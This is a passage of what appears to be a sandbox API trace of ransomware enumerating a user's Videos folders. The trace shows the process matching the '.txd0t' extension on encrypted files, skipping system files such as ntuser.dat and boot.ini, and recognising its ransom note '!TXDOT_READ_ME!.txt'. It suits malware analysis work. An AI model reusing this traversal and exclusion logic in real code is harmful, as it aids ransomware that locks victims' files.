psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="I8mA7.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t" [0129.738] PathFindExtensionW (pszPath="I8mA7.swf.txd0t") returned=".txd0t" [0129.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.738] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2=".") returned 1 [0129.738] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2="..") returned 1 [0129.738] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="iGBmnx.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t" [0129.738] PathFindExtensionW (pszPath="iGBmnx.swf.txd0t") returned=".txd0t" [0129.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.739] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2=".") returned 1 [0129.739] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2="..") returned 1 [0129.739] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="IWWrfzZp12CtwW5GR.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t" [0129.739] PathFindExtensionW (pszPath="IWWrfzZp12CtwW5GR.mkv.txd0t") returned=".txd0t" [0129.739] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.739] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2=".") returned 1 [0129.739] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2="..") returned 1 [0129.739] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="LISQrmwmwFkmeV9a6dun.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t" [0129.739] PathFindExtensionW (pszPath="LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned=".txd0t" [0129.739] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.739] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2=".") returned 1 [0129.739] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2="..") returned 1 [0129.739] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="MTVtI3u5U.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t" [0129.739] PathFindExtensionW (pszPath="MTVtI3u5U.mkv.txd0t") returned=".txd0t" [0129.739] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.739] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2=".") returned 1 [0129.739] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2="..") returned 1 [0129.739] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="mZX-jxKKh.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t" [0129.739] PathFindExtensionW (pszPath="mZX-jxKKh.mkv.txd0t") returned=".txd0t" [0129.739] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.739] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2=".") returned 1 [0129.739] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2="..") returned 1 [0129.739] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.739] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.740] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="Z2p1JCW7G9Pu", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0129.740] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0129.740] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\*", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*" [0129.740] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*", lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x5300ee3c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0129.740] StrCmpW (psz1=".", psz2=".") returned 0 [0129.740] StrCmpW (psz1="..", psz2=".") returned 1 [0129.740] StrCmpW (psz1="..", psz2="..") returned 0 [0129.740] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.740] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.740] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0129.740] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0129.740] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt" [0129.740] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.740] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.741] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.741] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2=".") returned 1 [0129.741] StrCmpW (psz1="AuNane-wUgoPDM.swf.txd0t", psz2="..") returned 1 [0129.741] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="AuNane-wUgoPDM.swf.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t" [0129.741] PathFindExtensionW (pszPath="AuNane-wUgoPDM.swf.txd0t") returned=".txd0t" [0129.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.741] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2=".") returned 1 [0129.741] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2="..") returned 1 [0129.741] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="w7jO4I_4r ubq7OFIn.flv.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t" [0129.741] PathFindExtensionW (pszPath="w7jO4I_4r ubq7OFIn.flv.txd0t") returned=".txd0t" [0129.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.741] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2=".") returned 1 [0129.741] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2="..") returned 1 [0129.741] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="ZXAEqbOqqWast AZ98L.flv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t" [0129.741] PathFindExtensionW (pszPath="ZXAEqbOqqWast AZ98L.flv.txd0t") returned=".txd0t" [0129.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.741] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2=".") returned 1 [0129.741] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2="..") returned 1 [0129.741] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.741] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="ay37U hT.mp4.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t" [0129.741] PathFindExtensionW (pszPath="ay37U hT.mp4.txd0t") returned=".txd0t" [0129.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.741] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2=".") returned 1 [0129.741] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2="..") returned 1 [0129.741] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="kxtmh_DCIU7SgwmG7I.swf.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t" [0129.742] PathFindExtensionW (pszPath="kxtmh_DCIU7SgwmG7I.swf.txd0t") returned=".txd0t" [0129.742] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.742] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2=".") returned 1 [0129.742] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2="..") returned 1 [0129.742] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="OoNzmd4unsBSLKUjo7.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t" [0129.742] PathFindExtensionW (pszPath="OoNzmd4unsBSLKUjo7.avi.txd0t") returned=".txd0t" [0129.742] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.742] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2=".") returned 1 [0129.742] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2="..") returned 1 [0129.742] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="t8NhEX.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t" [0129.742] PathFindExtensionW (pszPath="t8NhEX.mkv.txd0t") returned=".txd0t" [0129.742] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.742] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2=".") returned 1 [0129.742] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2="..") returned 1 [0129.742] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="VzUBwEA5P.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t" [0129.742] PathFindExtensionW (pszPath="VzUBwEA5P.avi.txd0t") returned=".txd0t" [0129.742] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.742] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2=".") returned 1 [0129.742] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2="..") returned 1 [0129.742] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.742] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="WxV-TMM4v.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t" [0129.742] PathFindExtensionW (pszPath="WxV-TMM4v.avi.txd0t") returned=".txd0t" [0129.742] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.743] StrCmpW (psz1="WlTa", psz2=".") returned 1 [0129.743] StrCmpW (psz1="WlTa", psz2="..") returned 1 [0129.743] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="WlTa", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.743] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\*") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\*" [0129.743] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\WlTa\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, 